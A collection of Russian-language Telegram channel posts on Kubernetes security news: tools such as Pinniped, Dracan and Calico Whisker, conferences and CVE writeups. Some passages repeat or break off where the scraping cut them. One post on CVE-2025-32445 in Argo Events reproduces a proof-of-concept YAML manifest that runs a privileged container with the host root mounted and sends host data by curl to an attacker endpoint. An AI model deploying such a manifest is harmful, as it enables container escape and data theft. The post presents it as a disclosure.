Сегодня хотим поделиться с вами очередным инструментом – Pinniped.
По сути,
По сути,
Pinniped выступает в роли authentication service для Kubernetes кластера. Он поддерживает различные authenticator types и OIDC identity providers, а также имплементирует различные стратегии интеграции с различными дистрибутивами Kubernetes для облегчения аутентификации.👍15🔥2
Наши друзья из Флант сделали картинку k8s security iceberg про механизмы безопасности в
На первый взгляд может показать, что подобное сделать легко, но это не так. В своих подходах к подобному у меня получалось или все очень просто - всего лишь несколько пунктов на каждом уровне или каждый пункт разбивался еще на 5-10 подпунктов. В общем детализация сильно усложняет подобное... На пример, можно просто написать
А как насчет взять и сделать совместную редакцию K8s(in)security community edition данного айсберга?) Давайте в комментариях к данному посту попробуем расширить/поправить/улучшить/... данную версию. Считаем что уровни айсберга идут сверху вниз от 1 до 8.
Kubernetes и их уровни: от более простых к более сложным. Тоесть с чего по их мнению обычно начинают и к чему можно прийти в увлекательном пути обеспечения безопасности.На первый взгляд может показать, что подобное сделать легко, но это не так. В своих подходах к подобному у меня получалось или все очень просто - всего лишь несколько пунктов на каждом уровне или каждый пункт разбивался еще на 5-10 подпунктов. В общем детализация сильно усложняет подобное... На пример, можно просто написать
security feature gates и admission controllers, или перечислить конкретные.А как насчет взять и сделать совместную редакцию K8s(in)security community edition данного айсберга?) Давайте в комментариях к данному посту попробуем расширить/поправить/улучшить/... данную версию. Считаем что уровни айсберга идут сверху вниз от 1 до 8.
1👍40🔥8❤1
Парочку объявлений:
1) CFP БеКон 2025
Сегодня последний день принятия заявок! Далее мы примерно неделю их обработаем и даем ответ с обратной связью. И будем постепенно публиковать программу. До
2) Итоги конкурса от
Победители:
- @malibuup (
- @atai_19 (
- @uburro (
Поздравляем победителей! И напоминаем про промокод на скидку в
1) CFP БеКон 2025
Сегодня последний день принятия заявок! Далее мы примерно неделю их обработаем и даем ответ с обратной связью. И будем постепенно публиковать программу. До
10 апреля можно успеть купить билет по ранней цене.2) Итоги конкурса от
DevOpsConf 2025Победители:
- @malibuup (
offline билет)- @atai_19 (
online билет)- @uburro (
online билет)Поздравляем победителей! И напоминаем про промокод на скидку в
5% при покупке билета dc25_k8security.bekon.luntry.ru
CFP конференции БЕКОН 2026
Принимаем заявки на доклад до 23:59 (МСК) 31 марта 2026 по темам, связанным с безопасностью Kubernetes.
50🔥13❤3
В преддверии KubeCon Europe 2025 прошел Cloud Native Rejekts Europe 2025 и уже доступны все записи докладов:
- Первый день зал The Nash
- Первый день зал The Waterloo
- Второй день зал The Nash
- Второй день зал The Waterloo
Отдельно отметить доклады:
- Kyverno Chronicles: A DevSecOps Tale
- Immutable Turtles All the Way Down – Image-Based Kubernetes to power In-Place Updates
- The future of configurability in Kubernetes with Common Expression Language (CEL)
- Pod Deep Dive: Everything You Didn't Know You Needed to Know
- What I wish I knew about container security
- Who Secures the Service Mesh? Mind the Gap in Your Mesh
- Securing AI/ML Workflows: Optimizing Container Images in Kubernetes Environments
- The Service Mesh Wars: A New Hope for Kubernetes
- The Kubernetes Guardians: A Deep Dive Into Your Security Avengers
- API-Driven Security Automation for AKS: Falco Talon meets eBPF-powered Retina
Смотреть, не пересмотреть, но мы вам позже обо всем этом расскажем ;)
- Первый день зал The Nash
- Первый день зал The Waterloo
- Второй день зал The Nash
- Второй день зал The Waterloo
Отдельно отметить доклады:
- Kyverno Chronicles: A DevSecOps Tale
- Immutable Turtles All the Way Down – Image-Based Kubernetes to power In-Place Updates
- The future of configurability in Kubernetes with Common Expression Language (CEL)
- Pod Deep Dive: Everything You Didn't Know You Needed to Know
- What I wish I knew about container security
- Who Secures the Service Mesh? Mind the Gap in Your Mesh
- Securing AI/ML Workflows: Optimizing Container Images in Kubernetes Environments
- The Service Mesh Wars: A New Hope for Kubernetes
- The Kubernetes Guardians: A Deep Dive Into Your Security Avengers
- API-Driven Security Automation for AKS: Falco Talon meets eBPF-powered Retina
Смотреть, не пересмотреть, но мы вам позже обо всем этом расскажем ;)
🔥15
С 30 по 31 марта в Лондоне, в предверии
Доклад доступен в записи трансляции.
KubeCon Europe 2025, прошла конференция Cloud Natvie Rejekts Europe 2025. Для тех кто не знает, напомним – на этой конференции спикеры это те люди, которых не взяли в основную программу KubeCon.Securing AI/ML Workflows: Optimizing Container Images in Kubernetes Environments – доклад, который не остался незамеченным. В нём, Wojciech Kocjan, рассказывает как готовить тонкие образы для AI / ML нужд – минимизируя ненужные зависимости, выбирая безопасные базовых образы, и оптимизируя время сборки.Доклад доступен в записи трансляции.
👍14🔥3🥰1
В официальном блоге
Kubernetes вышла статья "Kubernetes v1.33 sneak peek", посвященная предстоящему релизу новой версии. С точки зрения безопасности этот релиз примечателен тем, что в нем наконец-то спустя 9 лет до GA доберётся KEP-127: Support User Namespaces in pods! И это прям очень круто для безопасности контейнеров в Kubernetes - можно сказать настоящая веха и понятия root пользователя будет делиться на до этого момента и после этого момента) Почему именно так? Можно ознакомиться в прошлогоднем докладе с нашей конференции БеКон под названием "Linux user namespace в чертогах Kubernetes".🔥12👍5❤2🥰1
Подготовка к нашей конференции БеКон 2025 идет полным ходом: программа формируются, партнеры подписываются, первый мерч готовится, стикерпак печатается!
До
P.S. Билетов ограниченное количество, все с учетом размеров площадки, чтобы всем было комфортно.
До
3 июня уже не так-то и много времени осталось и возможность взять билеты по самой низкой цене ;)P.S. Билетов ограниченное количество, все с учетом размеров площадки, чтобы всем было комфортно.
🔥11❤2🥰1
Сегодня еще один пост про
Но уже про баги, точнее про обход механизма безопасности, который придумали и внедрили разработчики
1)
2)
3)
Если кратко, то задача данного механизма в том чтобы когда непривилегированный пользователь создавал
Получение таких привилегий может в дальнейшем использоваться для ядерных эксплойтов, например чтобы сбежать из контейнера. О таком мы уже рассказывали тут.
Linux user namespace ;)Но уже про баги, точнее про обход механизма безопасности, который придумали и внедрили разработчики
Ubuntu в свою ОС (в других ОС такой механизм вообще отсутствует). Оригинальный материал в заметке от исследователей называется "Three bypasses of Ubuntu's unprivileged user namespace restrictions" и описывает 3 способа обхода механизма sysctl kernel.apparmor_restrict_unprivileged_userns, через:1)
aa-exec2)
busybox3)
LD_PRELOADЕсли кратко, то задача данного механизма в том чтобы когда непривилегированный пользователь создавал
unprivileged user namespace в нем не содержалось опасных административных capabilities (типа CAP_SYS_ADMIN или CAP_NET_ADMIN), которые чрезвычайно увеличивают поверхность атаки на ядро ОС.Получение таких привилегий может в дальнейшем использоваться для ядерных эксплойтов, например чтобы сбежать из контейнера. О таком мы уже рассказывали тут.
Telegram
k8s (in)security
Хардкорная блоговая запись "CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google's KCTF Containers" еще один прекрасный пример (на ряду с CVE-2021-22555) побега из контейнера через kernel уязвимость хоста в рамках kCTF. Код эксплоита.…
👍14🔥4❤1
Недавно прошел KubeCon + CloudNativeCon Europe 2025 и видео еще не доступны, но есть уже слайды по некоторым докладам.
Хочется отметить доклад "Enhancing Software Composition Analysis Resilience Against Container Image Obfuscation", который продолжает тему сокрытия уязвимостей в образах контейнеров. Мы писали об этом тут, тут и тут. Но на этот раз ребят подошли тут к вопросу с академической точки зрения и со всеми соответствующими атрибутами этого. И у них получилось отлично дополнить картину прошлых работ. Также они выложили репозитарий с кодом "Container obfuscation benchmark", чтобы можно было повторить их эксперимент.
В очередной раз хочется сказать, что стройте
P.S. Ближайшие 2 дня наша команда на DevOpsConf 2025 - будем рады пообщаться лично!
Хочется отметить доклад "Enhancing Software Composition Analysis Resilience Against Container Image Obfuscation", который продолжает тему сокрытия уязвимостей в образах контейнеров. Мы писали об этом тут, тут и тут. Но на этот раз ребят подошли тут к вопросу с академической точки зрения и со всеми соответствующими атрибутами этого. И у них получилось отлично дополнить картину прошлых работ. Также они выложили репозитарий с кодом "Container obfuscation benchmark", чтобы можно было повторить их эксперимент.
В очередной раз хочется сказать, что стройте
ZeroTrust защиту, а не вокруг управления уязвимостями - они были, есть и будут (их еще и спрячут от вас).P.S. Ближайшие 2 дня наша команда на DevOpsConf 2025 - будем рады пообщаться лично!
🔥11👍3❤2
Сегодня хотим поделиться с вами статьей Signed container images in Kubernetes with Sigstore and HashiCorp Vault.
В ней автор рассказывает о том, как можно использовать подписанные
В ней автор рассказывает о том, как можно использовать подписанные
docker images совместно с Vault, а именно более подробно говорит про:- написание политик
- конфигуририрование Vault
- подпись и верификация container image
- загрузка подписи в репозиторий
- конфигурирование image signing policies через CRD👍18🔥5❤2❤🔥1
Давайте сегодня познакомимся с
1) Kyverno Playground - очевидно что для политик для
2) Rego Playground - для политик
3) CEL Playground - для политик
Думаем что легко можно заметить сильное влияние
P.S. Если вы по сей день не используете никакой из этих
online-площадками, где можно потренироваться в написании политик для Policy Engine как внешних по отношению к Kubernetes, так и встроенным:1) Kyverno Playground - очевидно что для политик для
Kyverno как на YAML, так и на CEL2) Rego Playground - для политик
OPA Gatekeeper на Rego (хотя OPA Gatekeeper уже поддерживает и CEL)3) CEL Playground - для политик
Validating Admission Policy на CELДумаем что легко можно заметить сильное влияние
Kubernetes Validating Admission Policy, появившегося в GA в 1.30, с его CEL. P.S. Если вы по сей день не используете никакой из этих
3-х движков, то непонятно как вы строите безопасность Kubernetes кластера ....👍18🔥8🥰4
Сегодня хотим поделиться очередным новым проектом с просторов
Авторы позиционируют его как легковесный инструмент, для эксплуатации которого не нужен опыт настройки
GitHub – Dracan. Довольно сложно описать Dracan одним предложением, однако скорее его можно отнести к чему-то между Authorization Policy от Istio, Network Policy и WAF. Сейчас он умеет следующее:- HTTP Method Filtering
- JSON Validation
- Request Limiting
- Payload Limitation
- URI Filtering
- Header ValidationАвторы позиционируют его как легковесный инструмент, для эксплуатации которого не нужен опыт настройки
WAF или большая DevOps экспертиза.👍15🔥5❤2🤡1
В
1)
2)
3)
Open Source версии Calico 3.30 появится собственный web-based графический интерфейс для просмотра и фильтрации flow логов для разбора проблем с соединениями и анализа работы NetworkPolicy. Данный компонент называется Whisker и состоит из трех компонентов:1)
Whisker UI - фронтенд2)
Whisker backend - бэкенд для получения данных3)
Goldmane - gRPC API server🔥50
Начинаем эту неделю с интересной статьи – Cloud Digital Forensics and Incident Response — Elastic Kubernetes Service Takeover Leads to Cryptominer Deployment.
В ней автор, на примере вымышленной истории, рассказывает как можно проводить форензику в
Также автор показывает как расследовать такой инцидент, используя
В ней автор, на примере вымышленной истории, рассказывает как можно проводить форензику в
AWS. Не смотря на то, что история вымышлена, в ней приводятся реальные техники атакующих – web application command injection, Instance Metadata Service (IMDS) access, JSON Web Token (JWT) abuse, и valid credential abuse.Также автор показывает как расследовать такой инцидент, используя
web server logs, container logs, CloudWatch Kubernetes logs, и CloudTrail logs.👍12❤3🔥3
Мало хорошо разбираться в
И тут хотелось бы обратить ваше внимание на его последний пост про отключение анонимного доступа к
Про опасность анонимного доступа и почему его важно отключать мы писали ранее тут и тут.
Kubernetes и его безопасности - он все равно тебя сможет рано или поздно удивить. И в таких ситуациях важно знать кто может подсказать в том или ином вопросе ;) Одним из людей к которым я периодически обращаюсь является Миша Петров и он не так давно завел свой канал по k8s и не только - Azalio_tech.И тут хотелось бы обратить ваше внимание на его последний пост про отключение анонимного доступа к
kube-apiserver, но оставляя health checks! Оказывается это возможно, но только придется похимичить с конфигами на новых версиях куба 1.31, 1.32. Про опасность анонимного доступа и почему его важно отключать мы писали ранее тут и тут.
Telegram
Azalio_tech
Разные заметки о kubernetes, linux и IT
https://www.linkedin.com/in/azalio/
https://www.linkedin.com/in/azalio/
🔥13👍6❤2😁1🤔1
22 апреля в 11:00 наша команда Luntry проведет вебинар «Безопасность контейнеров и Kubernetes для специалистов анализа качества». Вы можете задаться вопросом кого мы понимаем тут под специалистами анализа качества? Это специалисты, которым приходится проводить:
- Приёмо-сдаточные испытания (ПСИ) как для внутренних разработок, так и внешних/заказных
- Сертификацию программного обеспечения
- Разбираться с "черными ящиками"
И все это, конечно, в контейнерном исполнении для
Kubernetes. И естественно мы покажем как эту нетривиальную задачу можно очень просто решить с помощью нашего решения Luntry.Зарегистрироваться можно здесь.
P.S. Этот вебинар продолжение серии вебинаров, которые уже показывали как Luntry может помочь
CISO и SOC. Далее еще будет для DevSecOps специалистов, разработчиков, безопасников, отвечающих за сетевую безопасность и т.д.👍11🔥3
Вселенная
Всё дело в том, что
В версии 1.9.6 уязвимость исправили, разрешив пользователю ограниченно выставлять
Argo не ограничивается только лишь Argo CD. Так например, совсем недавно была раскрыта уязвимость CVE-2025-32445 с оценкой 10/10 по CVSS в Argo Events, позволяющая пользователю с правами на создание кастомных ресурсов EventSource и Sensor сбежать из контейнера и получить полный контроль над кластером.Всё дело в том, что
Argo Events обрабатывал поля securityContext (и другие) в EventSource, хотя этого не было явно указано в документации. В качестве PoC исследователь приложил следующий YAML манифест, в результате которого на сервер атакующего отправится hostname хоста и листинг /run/containerd/containerd.sock:
apiVersion: argoproj.io/v1alpha1
kind: EventSource
metadata:
name: poc-vulnerable-eventsource
spec:
webhook:
security-test:
port: "12000"
endpoint: "/webhook"
template:
container:
image: ubuntu:latest
command: ["/bin/bash"]
args: [
"-c",
"apt-get update && apt-get install -y curl && while true; do
rm -f /tmp/data;
echo '=== containerd socket ===' > /tmp/data 2>&1;
ls -la /host/run/containerd/containerd.sock >> /tmp/data 2>&1;
echo '=== proof of host access ===' >> /tmp/data 2>&1;
cat /host/etc/hostname >> /tmp/data 2>&1;
curl -X POST --data-binary @/tmp/data http://<attacker-controlled-endpoint>:8000/;
sleep 300;
done"
]
securityContext:
privileged: true
capabilities:
add: ["SYS_ADMIN"]
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
В версии 1.9.6 уязвимость исправили, разрешив пользователю ограниченно выставлять
.spec.template.container.👍25❤3🔥2🥰2
Стали доступны видеозаписи (
Следующие
- Hong Kong, China (June 10-11);
- Tokyo, Japan (June 16-17);
- Hyderabad, India (August 6-7);
- Atlanta, US (November 10-13).
P.S. А 3 июня в Москве состоится БеКон 2025 ;)
378 штук) и слайды с KubeCon + CloudNativeCon Europe 2025!Следующие
KubeCon + CloudNativeCon в этом году будут:- Hong Kong, China (June 10-11);
- Tokyo, Japan (June 16-17);
- Hyderabad, India (August 6-7);
- Atlanta, US (November 10-13).
P.S. А 3 июня в Москве состоится БеКон 2025 ;)
❤15🔥8👍3👎1🤮1
Мы начинаем публиковать доклады с программы БеКон 2025!
1) "Без секретов! Workload Identity Federation: безопасная аутентификация в облаке" (Дмитрий Лютов,
Строить безопасность в облаке без механизма
2) "Неочевидные и непонятные моменты безопасности Kubernetes" (Дмитрий Евдокимов,
Рабочее название доклада было "Ворчание старого деда про k8s security". А лейтмотивом стали вопросы на тренингах "Почему так?", "Почему до сих пор так?", "Почему не иначе?", "Доколе?" и т.д. В итоге, сформировался список таких моментов.
За детальным описанием можно обратиться сюда.
1) "Без секретов! Workload Identity Federation: безопасная аутентификация в облаке" (Дмитрий Лютов,
Yandex Cloud)Строить безопасность в облаке без механизма
Workload Identity очень сложная задача. И если в западных облаках его наличие уже само собой разумеющееся, то в наших просторах далеко не все вообще знают что это за зверь такой. Задача этого доклада рассказать как опасно жить без него, как он устроен и как спасает.2) "Неочевидные и непонятные моменты безопасности Kubernetes" (Дмитрий Евдокимов,
Luntry)Рабочее название доклада было "Ворчание старого деда про k8s security". А лейтмотивом стали вопросы на тренингах "Почему так?", "Почему до сих пор так?", "Почему не иначе?", "Доколе?" и т.д. В итоге, сформировался список таких моментов.
За детальным описанием можно обратиться сюда.
🔥26❤🔥3🥰2